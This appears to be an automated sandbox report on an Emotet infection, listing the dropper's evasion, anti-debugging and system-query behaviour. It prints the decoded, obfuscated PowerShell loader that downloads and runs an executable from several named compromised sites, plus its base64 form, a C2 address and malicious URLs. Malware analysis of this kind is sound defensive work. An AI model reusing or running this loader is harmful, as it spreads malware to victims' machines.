Found evasive API chain (may stop execution after checking a module file name)Show sources
Source: C:\Users\user\657.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_3-43055
Found large amount of non-executed APIsShow sources
Source: C:\Users\user\657.exeAPI coverage: 0.8 %
May sleep (evasive loops) to hinder dynamic analysisShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1508Thread sleep time: -120000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4092Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Users\user\657.exe TID: 2156Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Windows\System32\eventcreate\eventcreate.exe TID: 2208Thread sleep time: -180000s >= -30000sJump to behavior
Checks the free space of harddrivesShow sources
Source: C:\Users\user\657.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Users\user\657.exeCode function: 3_2_00428AA3 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlen,3_2_00428AA3
Enumerates the file systemShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Program exit pointsShow sources
Source: C:\Users\user\657.exeAPI call chain: ExitProcess graph end nodegraph_3-42927
Source: C:\Users\user\657.exeAPI call chain: ExitProcess graph end nodegraph_3-42914
Queries a list of all running processesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging:

barindex
Contains functionality to check if a debugger is running (IsDebuggerPresent)Show sources
Source: C:\Users\user\657.exeCode function: 3_2_0044271F _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_0044271F
Contains functionality to dynamically determine API callsShow sources
Source: C:\Users\user\657.exeCode function: 3_2_004C0C10 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,3_2_004C0C10
Contains functionality to read the PEBShow sources
Source: C:\Users\user\657.exeCode function: 3_2_00403040 mov eax, dword ptr fs:[00000030h]3_2_00403040
Source: C:\Windows\System32\eventcreate\eventcreate.exeCode function: 4_2_00582F7F mov eax, dword ptr fs:[00000030h]4_2_00582F7F
Source: C:\Windows\System32\eventcreate\eventcreate.exeCode function: 4_2_00580467 mov eax, dword ptr fs:[00000030h]4_2_00580467
Source: C:\Windows\System32\eventcreate\eventcreate.exeCode function: 4_2_00583D1F mov eax, dword ptr fs:[00000030h]4_2_00583D1F
Source: C:\Windows\System32\eventcreate\eventcreate.exeCode function: 4_2_00593640 mov eax, dword ptr fs:[00000030h]4_2_00593640
Source: C:\Windows\System32\eventcreate\eventcreate.exeCode function: 4_2_005943E0 mov eax, dword ptr fs:[00000030h]4_2_005943E0
Contains functionality which may be used to detect a debugger (GetProcessHeap)Show sources
Source: C:\Users\user\657.exeCode function: 3_2_0043C85E GetStartupInfoA,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,_fast_error_exit,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,_fast_error_exit,_fast_error_exit,__RTC_Initialize,__ioinit,GetCommandLineA,___crtGetEnvironmentStringsA,__setargv,__setenvp,__cinit,__wincmdln,3_2_0043C85E
Enables debug privilegesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Contains functionality to register its own exception handlerShow sources
Source: C:\Users\user\657.exeCode function: 3_2_00444764 SetUnhandledExceptionFilter,__encode_pointer,3_2_00444764
Source: C:\Users\user\657.exeCode function: 3_2_0044C66F __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_0044C66F
Source: C:\Users\user\657.exeCode function: 3_2_0044271F _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_0044271F
Source: C:\Users\user\657.exeCode function: 3_2_00444786 __decode_pointer,SetUnhandledExceptionFilter,3_2_00444786
Source: C:\Users\user\657.exeCode function: 3_2_0043B294 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_0043B294

HIPS / PFW / Operating System Protection Evasion:

barindex
Encrypted powershell cmdline option foundShow sources
Source: unknownProcess created: Base64 decoded $Zueeozgsi='Abojfxzl';$Suyxgsdgk = '657';$Alhibcphheqvd='Yxlsrzfrtxixn';$Cgccllyj=$env:userprofile+'\'+$Suyxgsdgk+'.exe';$Yjwattwfy='Atxjfkwh';$Qxgbjgvyp=.('n'+'e'+'w-object') Net.webClieNt;$Oqrcrqialwps='http://supcargo.com/Login/K/*http://sunucuo.com/wp-admin/0V0e/*http://sweetestshop.ca/wp/3ca5oq/*http://subhedarmarketing.com/2/7gtTEM8/*http://takharandshankertour.com/wp-includes/IXR/2/'."s`PLiT"([char]42);$Zyryvuol='Ccbfgydse';foreach($Echyjilno in $Oqrcrqialwps){try{$Qxgbjgvyp."dOWnlOA`d`FILe"($Echyjilno, $Cgccllyj);$Noozltjryagg='Lfbxyitfyzysr';If ((.('Get-I'+'te'+'m') $Cgccllyj)."LE`NG`TH" -ge 22479) {([wmiclass]'win32_Process')."C`REaTe"($Cgccllyj);$Ecwkmjczk='Tuewvxfv';break;$Vguxhqob='Glqwdksn'}}catch{}}$Cnxdaltd='Mhnfjwbmetnx'
Very long cmdline option found, this is very uncommon (may be encrypted or packed)Show sources
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powersheLL -e JABaAHUAZQBlAG8AegBnAHMAaQA9ACcAQQBiAG8AagBmAHgAegBsACcAOwAkAFMAdQB5AHgAZwBzAGQAZwBrACAAPQAgACcANgA1ADcAJwA7ACQAQQBsAGgAaQBiAGMAcABoAGgAZQBxAHYAZAA9ACcAWQB4AGwAcwByAHoAZgByAHQAeABpAHgAbgAnADsAJABDAGcAYwBjAGwAbAB5AGoAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAFMAdQB5AHgAZwBzAGQAZwBrACsAJwAuAGUAeABlACcAOwAkAFkAagB3AGEAdAB0AHcAZgB5AD0AJwBBAHQAeABqAGYAawB3AGgAJwA7ACQAUQB4AGcAYgBqAGcAdgB5AHAAPQAuACgAJwBuACcAKwAnAGUAJwArACcAdwAtAG8AYgBqAGUAYwB0ACcAKQAgAE4AZQB0AC4AdwBlAGIAQwBsAGkAZQBOAHQAOwAkAE8AcQByAGMAcgBxAGkAYQBsAHcAcABzAD0AJwBoAHQAdABwADoALwAvAHMAdQBwAGMAYQByAGcAbwAuAGMAbwBtAC8ATABvAGcAaQBuAC8ASwAvACoAaAB0AHQAcAA6AC8ALwBzAHUAbgB1AGMAdQBvAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwAwAFYAMABlAC8AKgBoAHQAdABwADoALwAvAHMAdwBlAGUAdABlAHMAdABzAGgAbwBwAC4AYwBhAC8AdwBwAC8AMwBjAGEANQBvAHEALwAqAGgAdAB0AHAAOgAvAC8AcwB1AGIAaABlAGQAYQByAG0AYQByAGsAZQB0AGkAbgBnAC4AYwBvAG0ALwAyAC8ANwBnAHQAVABFAE0AOAAvACoAaAB0AHQAcAA6AC8ALwB0AGEAawBoAGEAcgBhAG4AZABzAGgAYQBuAGsAZQByAHQAbwB1AHIALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAEkAWABSAC8AMgAvACcALgAiAHMAYABQAEwAaQBUACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQAWgB5AHIAeQB2AHUAbwBsAD0AJwBDAGMAYgBmAGcAeQBkAHMAZQAnADsAZgBvAHIAZQBhAGMAaAAoACQARQBjAGgAeQBqAGkAbABuAG8AIABpAG4AIAAkAE8AcQByAGMAcgBxAGkAYQBsAHcAcABzACkAewB0AHIAeQB7ACQAUQB4AGcAYgBqAGcAdgB5AHAALgAiAGQATwBXAG4AbABPAEEAYABkAGAARgBJAEwAZQAiACgAJABFAGMAaAB5AGoAaQBsAG4AbwAsACAAJABDAGcAYwBjAGwAbAB5AGoAKQA7ACQATgBvAG8AegBsAHQAagByAHkAYQBnAGcAPQAnAEwAZgBiAHgAeQBpAHQAZgB5AHoAeQBzAHIAJwA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtAEkAJwArACcAdABlACcAKwAnAG0AJwApACAAJABDAGcAYwBjAGwAbAB5AGoAKQAuACIATABFAGAATgBHAGAAVABIACIAIAAtAGcAZQAgADIAMgA0ADcAOQApACAAewAoAFsAdwBtAGkAYwBsAGEAcwBzAF0AJwB3AGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzACcAKQAuACIAQwBgAFIARQBhAFQAZQAiACgAJABDAGcAYwBjAGwAbAB5AGoAKQA7ACQARQBjAHcAawBtAGoAYwB6AGsAPQAnAFQAdQBlAHcAdgB4AGYAdgAnADsAYgByAGUAYQBrADsAJABWAGcAdQB4AGgAcQBvAGIAPQAnAEcAbABxAHcAZABrAHMAbgAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABDAG4AeABkAGEAbAB0AGQAPQAnAE0AaABuAGYAagB3AGIAbQBlAHQAbgB4ACcA
May try to detect the Windows Explorer process (often used for injection)Show sources
Source: eventcreate.exe, 00000004.00000002.1370643380.007F0000.00000002.00000001.sdmpBinary or memory string: Program Manager
Source: eventcreate.exe, 00000004.00000002.1370643380.007F0000.00000002.00000001.sdmpBinary or memory string: Progman
Source: eventcreate.exe, 00000004.00000002.1370643380.007F0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd

Language, Device and Operating System Detection:

barindex
Contains functionality locales information (e.g. system language)Show sources
Source: C:\Users\user\657.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,3_2_0045A05D
Source: C:\Users\user\657.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,3_2_0045C068
Source: C:\Users\user\657.exeCode function: EnumSystemLocalesA,3_2_0045C03E
Source: C:\Users\user\657.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,3_2_0045C0CD
Source: C:\Users\user\657.exeCode function: _TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,3_2_0045C109
Source: C:\Users\user\657.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,InterlockedDecrement,InterlockedDecrement,3_2_0045A2E1
Source: C:\Users\user\657.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,__alloca_probe_16,_malloc,GetLocaleInfoA,MultiByteToWideChar,__freea,3_2_0045C5E9
Source: C:\Users\user\657.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,3_2_0045A5A5
Source: C:\Users\user\657.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoW_stat,3_2_0045C724
Source: C:\Users\user\657.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoA,3_2_0044C780
Source: C:\Users\user\657.exeCode function: GetThreadLocale,GetLocaleInfoA,GetACP,3_2_00464FD9
Source: C:\Users\user\657.exeCode function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA,3_2_0041B3F3
Source: C:\Users\user\657.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,3_2_004599CE
Source: C:\Users\user\657.exeCode function: GetLocaleInfoA,3_2_004619BF
Source: C:\Users\user\657.exeCode function: GetLocaleInfoA,3_2_0045BBC3
Contains functionality to query CPU information (cpuid)Show sources
Source: C:\Users\user\657.exeCode function: 3_2_00455551 cpuid 3_2_00455551
Queries the volume information (name, serial number etc) of a deviceShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Users\user\657.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\657.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\657.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\657.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\657.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\657.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\657.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\eventcreate\eventcreate.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\eventcreate\eventcreate.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\eventcreate\eventcreate.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\eventcreate\eventcreate.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\eventcreate\eventcreate.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\eventcreate\eventcreate.exeQueries volume information: C:\ VolumeInformationJump to behavior
Contains functionality to query local / system timeShow sources
Source: C:\Users\user\657.exeCode function: 3_2_004475B7 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,3_2_004475B7
Contains functionality to query time zone informationShow sources
Source: C:\Users\user\657.exeCode function: 3_2_0044F600 __lock,__invoke_watson,__invoke_watson,__invoke_watson,____lc_codepage_func,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson,3_2_0044F600
Contains functionality to query windows versionShow sources
Source: C:\Users\user\657.exeCode function: 3_2_0043C85E GetStartupInfoA,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,_fast_error_exit,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,_fast_error_exit,_fast_error_exit,__RTC_Initialize,__ioinit,GetCommandLineA,___crtGetEnvironmentStringsA,__setargv,__setenvp,__cinit,__wincmdln,3_2_0043C85E
Queries the cryptographic machine GUIDShow sources
Source: C:\Users\user\657.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Stealing of Sensitive Information:

barindex
Yara detected EmotetShow sources
Source: Yara matchFile source: 00000004.00000002.1370429666.00591000.00000020.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000002.964295216.002E1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000002.1370410119.00580000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000002.964278358.002D0000.00000040.00000001.sdmp, type: MEMORY

Remote Access Functionality:

barindex
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)Show sources
Source: C:\Users\user\657.exeCode function: 3_2_0040EE65 CreateBindCtx,CoTaskMemFree,3_2_0040EE65

Malware Configuration

Threatname: Emotet

{"C2 list": ["71.126.247.90/em0StrbgyF1rMGA"]}

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Simulations

Behavior and APIs

TimeTypeDescription
17:18:26API Interceptor25x Sleep call for process: powershell.exe modified
17:18:29API Interceptor31x Sleep call for process: 657.exe modified
17:18:40API Interceptor1116x Sleep call for process: eventcreate.exe modified

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
VJW-020120 SKT-020720.doc55%VirustotalBrowse
VJW-020120 SKT-020720.doc100%AviraW2000M/Agent.12622
VJW-020120 SKT-020720.doc100%Joe Sandbox ML

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\657.exe100%AviraTR/AD.Emotet.aouip
C:\Users\user\657.exe31%VirustotalBrowse

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
supcargo.com10%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
http://supcargo.com/Login/K/18%VirustotalBrowse
http://supcargo.com/Login/K/0%Avira URL Cloudsafe
http://71.126.247.90/em0StrbgyF1rMGAyHE/irxhN9ps3YEgB9agV/xAhxY/END0L/FVgPFqYg/0%Avira URL Cloudsafe
http://71.126.247.90/em0StrbgyF1rM